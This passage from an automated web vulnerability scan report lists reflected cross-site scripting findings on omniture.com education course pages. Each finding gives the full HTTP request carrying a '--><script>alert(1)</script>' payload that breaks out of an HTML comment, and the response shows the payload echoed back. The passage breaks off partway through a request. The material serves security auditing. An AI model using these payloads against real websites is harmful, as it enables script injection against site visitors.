Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:09:06 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:09:06 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:09:07 GMT
Content-Length: 23145
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:09:06 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>f92a9dde036/dop_analyst cached on 2 February 2011 at 11:09:06 PST (0d66dcbf8c67576b84cc82e1eeb9a9ce) -->
...[SNIP]...

4.481. http://www.omniture.com/en/education/courses/dop_analyst [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/dop_analyst

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 2183f--><script>alert(1)</script>940eaeea82d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/courses/dop_analyst2183f--><script>alert(1)</script>940eaeea82d HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:09:50 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:09:50 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:09:50 GMT
Content-Length: 23145
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:09:50 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>940eaeea82d cached on 2 February 2011 at 11:09:50 PST (9e28374600ac595efe3b3c9ac534a3c4) -->
...[SNIP]...

4.482. http://www.omniture.com/en/education/courses/merchandising [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/merchandising

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload c2a10--><script>alert(1)</script>8ec86a79fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/coursesc2a10--><script>alert(1)</script>8ec86a79fb/merchandising HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:10:29 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:10:29 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:10:30 GMT
Content-Length: 23147
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:10:29 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>8ec86a79fb/merchandising cached on 2 February 2011 at 11:10:29 PST (6185302852f0b7e965598484ed0d3e6b) -->
...[SNIP]...

4.483. http://www.omniture.com/en/education/courses/merchandising [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/merchandising

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload e6290--><script>alert(1)</script>ee3df5ac240 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/courses/merchandisinge6290--><script>alert(1)</script>ee3df5ac240 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:11:13 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:11:13 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:11:13 GMT
Content-Length: 23149
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:13 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>ee3df5ac240 cached on 2 February 2011 at 11:11:13 PST (bba413f1f92fa5f6ecefeb0b882d0c73) -->
...[SNIP]...

4.484. http://www.omniture.com/en/education/courses/online_marketing_suite [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/online_marketing_suite

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload b83d5--><script>alert(1)</script>d520792ef05 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/coursesb83d5--><script>alert(1)</script>d520792ef05/online_marketing_suite HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:10:38 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:10:38 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:10:38 GMT
Content-Length: 23167
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:10:38 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>d520792ef05/online_marketing_suite cached on 2 February 2011 at 11:10:38 PST (3da7b4d052fdfee26723f7d9fc181c1d) -->
...[SNIP]...

4.485. http://www.omniture.com/en/education/courses/online_marketing_suite [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/online_marketing_suite

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload de8e1--><script>alert(1)</script>ac75454414c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/courses/online_marketing_suitede8e1--><script>alert(1)</script>ac75454414c HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:11:05 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:11:05 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:11:05 GMT
Content-Length: 23167
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:05 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>ac75454414c cached on 2 February 2011 at 11:11:05 PST (6a82efa1a312cc5b50b89f0c56639005) -->
...[SNIP]...

4.486. http://www.omniture.com/en/education/courses/sbu [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/sbu

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 7b850--><script>alert(1)</script>80678e5f3b8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/courses7b850--><script>alert(1)</script>80678e5f3b8/sbu HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:09:05 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:09:05 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:09:05 GMT
Content-Length: 23129
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:09:05 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>80678e5f3b8/sbu cached on 2 February 2011 at 11:09:05 PST (8c293fb72b2a442d5595555a4b596e6f) -->
...[SNIP]...

4.487. http://www.omniture.com/en/education/courses/sbu [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/sbu

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 2ee48--><script>alert(1)</script>77c6d5a7b53 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/courses/sbu2ee48--><script>alert(1)</script>77c6d5a7b53 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:09:44 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:09:44 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:09:44 GMT
Content-Length: 23129
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:09:44 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>77c6d5a7b53 cached on 2 February 2011 at 11:09:44 PST (93b1b543e9c69c5118c3b336fa69916e) -->
...[SNIP]...

4.488. http://www.omniture.com/en/education/courses/searchcenter [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/searchcenter

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 2fe6d--><script>alert(1)</script>0173219665 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/courses2fe6d--><script>alert(1)</script>0173219665/searchcenter HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:10:05 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:10:05 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:10:05 GMT
Content-Length: 23145
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:10:05 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>0173219665/searchcenter cached on 2 February 2011 at 11:10:05 PST (41fc363e5400237ea6c88f55194ab026) -->
...[SNIP]...

4.489. http://www.omniture.com/en/education/courses/searchcenter [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/searchcenter

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload b1853--><script>alert(1)</script>ce0f03048e3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/courses/searchcenterb1853--><script>alert(1)</script>ce0f03048e3 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:10:34 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:10:34 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:10:34 GMT
Content-Length: 23147
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:10:34 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>ce0f03048e3 cached on 2 February 2011 at 11:10:34 PST (a3e5473b636ee72bdf31524d77333390) -->
...[SNIP]...

4.490. http://www.omniture.com/en/education/courses/sitesearch [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/sitesearch

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 2a51d--><script>alert(1)</script>78cd85c4adf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/courses2a51d--><script>alert(1)</script>78cd85c4adf/sitesearch HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:10:51 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:10:51 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:10:52 GMT
Content-Length: 23143
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:10:51 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>78cd85c4adf/sitesearch cached on 2 February 2011 at 11:10:51 PST (474665a4683c4f4badd6993b8b757e42) -->
...[SNIP]...

4.491. http://www.omniture.com/en/education/courses/sitesearch [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/sitesearch

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload b29d5--><script>alert(1)</script>88d60800004 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/courses/sitesearchb29d5--><script>alert(1)</script>88d60800004 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:11:18 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:11:18 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:11:18 GMT
Content-Length: 23143
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:18 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>88d60800004 cached on 2 February 2011 at 11:11:18 PST (13340140f6493e3a9b5ae0c887a6cfed) -->
...[SNIP]...

4.492. http://www.omniture.com/en/education/courses/survey [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/survey

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 94d2d--><script>alert(1)</script>c1f50fee5cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/courses94d2d--><script>alert(1)</script>c1f50fee5cf/survey HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
